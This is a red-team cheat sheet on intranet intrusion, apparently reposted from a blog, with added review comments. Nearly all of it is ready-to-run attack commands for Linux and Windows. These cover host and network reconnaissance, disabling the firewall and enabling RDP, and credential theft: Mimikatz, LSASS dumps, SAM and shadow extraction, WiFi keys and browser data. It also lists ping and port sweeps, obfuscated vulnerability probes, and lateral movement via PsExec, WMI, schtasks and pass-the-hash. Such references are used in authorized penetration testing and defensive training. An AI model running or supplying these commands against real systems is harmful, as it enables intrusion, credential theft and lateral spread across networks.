Intranet intrusion

Source: https://cobaltstrike.net/2021/02/20/intranet-intrusion/

System information

Basic Information

  • Linux
# Kernel / system version
uname -a
# Boot time — NOTE(review): `who -r` prints the current runlevel and the time it was
# entered, which only approximates boot time on some systems; `uptime -s` is the
# direct form. Kept as in the original.
who -r
# Process list
ps -aux
# Shell command history (bash/zsh/... history files under $HOME)
cat ~/.*sh_history
# Local services (systemd only)
systemctl --type=service
# Detect a Docker container: presence of /.dockerenv, or "docker" in PID 1's cgroup
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
  • Windows
# System version
systeminfo
# Process list
tasklist
# All drive letters
fsutil fsinfo drives
# Boot time (the "Statistics since" line)
net statistics workstation
# Installed software — NOTE(review): querying Win32_Product is slow and is known to
# trigger MSI consistency checks that write Application event-log entries; wmic is
# also deprecated on current Windows releases. Kept as in the original.
wmic product get name,version
# Local services
wmic service get name,pathname,startmode
# Startup programs
wmic startup get caption,command,location
# PowerShell command history (PSReadLine, current user only)
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

User Info

  • Linux
# Logged-in users (falls back to `who` if `w` is unavailable)
w || who
# User list — only accounts whose shell is /bin/bash; accounts with other login
# shells (sh, zsh, fish, ...) are not listed
cat /etc/passwd | grep /bin/bash
# Administrator accounts: every entry whose UID (field 3) is 0
cat /etc/passwd | awk -F: "\$3==0"
  • Windows
# User list
net user
# Logged-in users / sessions
query user
# Current user's privileges, groups and SID
whoami /all
# Members of the local Administrators group
net localgroup Administrators

Network information

  • Linux
# ARP cache
arp -a
# Network configuration — NOTE(review): ifconfig/route/netstat come from net-tools,
# which may be absent on newer distributions; `ip addr`, `ip route` and `ss -pantu`
# are the iproute2 equivalents. Kept as in the original.
ifconfig
# Routing table
route -n
# Listening ports and connections with owning process
netstat -pantu
# Hosts file
cat /etc/hosts
# Proxy configuration (http_proxy / https_proxy / no_proxy etc. in the environment)
env | grep -i proxy
  • Windows
# ARP cache
arp -a
# Shared folders
net share
# Routing table
route print
# Listening ports and connections with owning PID
netstat -nao
# Network configuration
ipconfig /all
# DNS cache
ipconfig /displaydns
# Hosts file
type C:\Windows\System32\drivers\etc\hosts
# Proxy configuration (current user's WinINET settings; Proxy* matches ProxyEnable/ProxyServer/ProxyOverride)
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Proxy*

Remote management

  • Linux
# SSH port — the pattern is unanchored and case-insensitive, so a commented-out
# "#Port 22" line is reported too
grep -Ei "Port [0-9]+" /etc/ssh/sshd_config
# SSH login log: unique IPv4 addresses seen in the wtmp login records
last | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
# SSH history: IPv4 addresses recorded in any known_hosts file.
# NOTE(review): `find /` without 2>/dev/null emits permission errors, the unquoted
# xargs input breaks on paths with spaces, and hosts are hashed (HashKnownHosts)
# on many systems, in which case nothing is found. Kept as in the original.
find / -name known_hosts | xargs grep -Eho "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
  • Windows
# Enable RDP — NOTE(review): these two lines change system configuration (allow
# Terminal Services connections); they are not read-only checks and the registry
# change persists until reverted
wmic RDTOGGLE where ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# RDP port (default 3389)
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
# RDP client history: saved server entries for every loaded user hive
Get-ChildItem 'Registry::HKEY_USERS\*\Software\Microsoft\Terminal Server Client\Servers\*' 2> $null
# RDP login log: unique IPv4 addresses found in successful-logon events (4624).
# NOTE(review): Get-EventLog exists only in Windows PowerShell 5.1; on PowerShell 7
# use Get-WinEvent. Reads the full Security log, so it can be slow.
Get-EventLog Security -InstanceId 4624 | ?{$_.Message -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'} | %{$Matches.Values} | Sort -Unique

Firewall

  • Linux
  • Windows
# Show status of all profiles
netsh advfirewall show allprofiles
# Disable the firewall — NOTE(review): destructive configuration change on every
# profile. `netsh firewall` is the legacy context (removed on current Windows);
# `netsh advfirewall` is the supported one, which is why both forms are listed.
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
# Allow an inbound port (legacy and current syntax)
netsh firewall add portopening name="RDP" mode=enable protocol=TCP port=3389
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
# Allow an inbound program (legacy and current syntax; C:\File.exe is a placeholder)
netsh firewall add allowedprogram name="File" mode=enable program="C:\File.exe"
netsh advfirewall firewall add rule name="File" dir=in action=allow program="C:\File.exe"

Credential collection

WiFi password

  • Linux
cd /etc/NetworkManager/system-connections && grep -rH "psk=" | sed "s/psk=//"
  • Windows
netsh wlan show profile name="WIFI名称" key=clear

Browser records

  • HackBrowserData
hack-browser-data -b all -f csv --cc --dir Temp

Hashed credentials

  • Linux
cat /etc/shadow | awk -F: "length(\$2)>3"
  • Windows
# Mimikatz, live LSASS
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Reg + Mimikatz: export the SAM and SYSTEM hives, parse them offline
reg save HKLM\SAM SAM.hive
reg save HKLM\SYSTEM SYSTEM.hive
mimikatz "lsadump::sam /sam:SAM.hive /system:SYSTEM.hive" "exit"
# ProcDump + Mimikatz: full memory dump of lsass.exe, parsed offline
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
# Enable WDigest auth — NOTE(review): persistent registry change (UseLogonCredential=1),
# not a read-only step; this key is a well-known detection indicator and should be
# reverted after an engagement
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Host discovery

Ping sweep (alive hosts)

  • Linux
echo 192.168.0.{1..254} | xargs -n1 -P 10 ping -w 1 -c 1 | grep -i TTL | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}"
  • Windows
for /L %I in (1, 1, 254) do @ping -w 1 -n 1 192.168.0.%I | findstr /I "TTL"

Port scan

  • Linux
for IP in 192.168.0.{1..254}; do echo -n "22,80,443,3389" | xargs -P 10 -d "," -i timeout 1 bash -c "echo >/dev/tcp/$IP/{} && echo '$IP:{} open'" 2>/dev/null; done
  • Windows
ForEach($IP in (1..254|%{'192.168.1.'+$_})){ForEach($Port in 22,80,443,3389){$TCP=New-Object Net.Sockets.TcpClient;if($TCP.BeginConnect($IP,$Port,$NULL,$NULL).AsyncWaitHandle.WaitOne(300,$False)){$IP+':'+$Port+' open'}$TCP.Close()}}

Vulnerability Scan

  • Linux
echo aHR0cDovL2V4YW1wbGUuY29t | base64 -d | xargs -P 10 -i timeout 3 bash -c 'curl -X POST -H "Content-Type: application/json" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64)" -d "$(echo eyJpZCI6IDEwfQ== | base64 -d)" -iks {} | grep -Eq "漏洞规则" && echo [+] {}'
  • Windows
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cDovL2V4YW1wbGUuY29t')).Split()|%{if((Invoke-WebRequest -Method POST -URI $_ -TimeoutSec 3 -Headers @{'Content-Type'='application/x-www-form-urlencoded';'User-Agent'='Mozilla/5.0 (Windows NT 10.0; Win64)'} -Body $([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('a2V5PXh4eA==')))|Select RawContent) -match '漏洞规则'){'[+] '+$_}} 2>$NULL

Lateral movement

IPC$ pipe

  • IPC
# Open an IPC$ session to the host with explicit credentials, then remove it.
# NOTE(review): the password is passed on the command line, so it is visible in
# process listings and in command-line auditing (e.g. event 4688 with command-line logging).
net use \\192.168.1.1\IPC$ Password /user:Domain\User
net use \\192.168.1.1\IPC$ /del
  • Sc
# Create a remote service whose binary path is "Shell" (placeholder), start it,
# then delete it. The space after `binPath=` is required by sc's syntax. Requires an
# existing authenticated session to the host (e.g. the IPC$ session above).
sc \\192.168.1.1 create StartUp binPath= "Shell"
sc \\192.168.1.1 start  StartUp
sc \\192.168.1.1 delete StartUp
  • WMI
wmic /node:192.168.1.1 /user:Administrator /password:123456 process call create "Shell"
  • PsExec
psexec -accepteula \\192.168.1.1 -u Administrator -p 123456 -s "Shell"
  • WinRM
winrs -r:http://192.168.1.1:5985 -u:Administrator -p:123456 "Shell"
  • Schtasks
# Create a one-shot remote scheduled task running as SYSTEM at 12:00, trigger it
# immediately (/run /i), then delete it. "Shell" and the credentials are placeholders.
schtasks /create /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /ru SYSTEM /sc onCE /st 12:00 /tr "Shell"
schtasks /run /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /i
schtasks /delete /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /f

Pass-the-hash

  • Impacket
# Impacket examples authenticating with an NT hash: the -hashes value is
# LMHASH:NTHASH, with the LM part left empty before the colon. The hash shown is a
# sample value from the original article.
psexec.py  -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1
smbexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1
  • Mimikatz
# PTK (pass-the-key): list Kerberos keys, then start a session with an AES-256 key.
# NOTE(review): the sample /aes256 value is 32 hex characters (16 bytes, NT-hash
# length); a real AES-256 key is 32 bytes / 64 hex characters, so this is a placeholder.
mimikatz "privilege::debug" "sekurlsa::ekeys" "exit"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /aes256:32ed87bdb5fdc5e9cba88547376818d4" "exit"
# PTH (pass-the-hash) with an NT hash
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4" "exit"
# RDP: setting DisableRestrictedAdmin to 0 turns Restricted Admin mode on (persistent
# registry change, not read-only), then mstsc is started in that mode
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4 \"/run:mstsc.exe /restrictedadmin\"" "exit"

Pass-the-ticket

NTLM relay


Article author: DongHuangT1
Article link: https://DongHuangT1.com/writings/RedTeam-6/